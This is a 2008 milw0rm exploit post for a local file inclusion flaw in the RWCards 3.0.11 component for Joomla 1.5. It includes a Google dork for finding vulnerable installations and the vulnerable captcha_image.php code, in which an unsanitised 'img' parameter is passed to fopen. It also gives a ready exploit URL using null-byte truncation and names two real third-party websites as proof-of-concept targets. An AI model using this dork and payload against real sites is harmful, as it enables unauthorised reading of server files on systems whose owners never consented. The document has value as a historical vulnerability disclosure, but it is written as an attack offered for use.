[o]------------------------------------------------------------------------------------[x]
| Local File Inclusion Vulnerability |
[o]------------------------------------------------------------------------------------[o]
| Software : RWCards 3.0.11 Component for Joomla 1.5 CMS |
| Vendor : http://www.weberr.de/ |
| Date : 23 October 2008 |
| Author : Vrs-hCk |
| Contact : d00r[at]telkom[dot]net |
[o]------------------------------------------------------------------------------------[o]
[»] Google Dork
inurl:com_rwcards
[»] Vulnerable
./components/com_rwcards/captcha/captcha_image.php
15: if (!empty( $_GET['img'] ) )
16: $img = $_GET['img'];
17: else
18: {
19: echo 'no image file specified via &img=...';
20: exit;
21: }
22:
23: if (!$fh = fopen( $tmp_dir_path.'cap_'.$img.'.jpg', 'rb'))
24: {
25: echo 'could not open image file!';
26: }
27: else
28: {
29: fpassthru( $fh );
30: fclose( $fh );
31: }
[»] Exploit
http://[site]/[path]/components/com_rwcards/captcha/captcha_image.php?img=[LFI]%00
[»] Proof of Concept
http://www.abcdobebe.com/components/com_rwcards/captcha/captcha_image.php?img=[LFI]%00
http://www.whiskynet.co.uk/components/com_rwcards/captcha/captcha_image.php?img=[LFI]%00
[o]------------------------------------------------------------------------------------[x]
| Greetz |
[o]------------------------------------------------------------------------------------[o]
| All Member oF MainHack BrotherHood - www.MainHack.com - www.ServerIsDown.org |
| Paman, OoN_Boy, NoGe, Fluzy, H312Y, s3t4n, Angela Chang, IrcMafia, }^-^{, em|nem, |
| loqsa, pizzyroot, xx_user, ^Bradley, ayulina, MaDOnk, nTc, terbang_melayang, |
| chawanua, bl4Ck_3n91n3, R3V4N_B4ST4RD, dkk ... c0li.m0de.0n !!! |
[o]------------------------------------------------------------------------------------[o]
# milw0rm.com [2008-10-23]
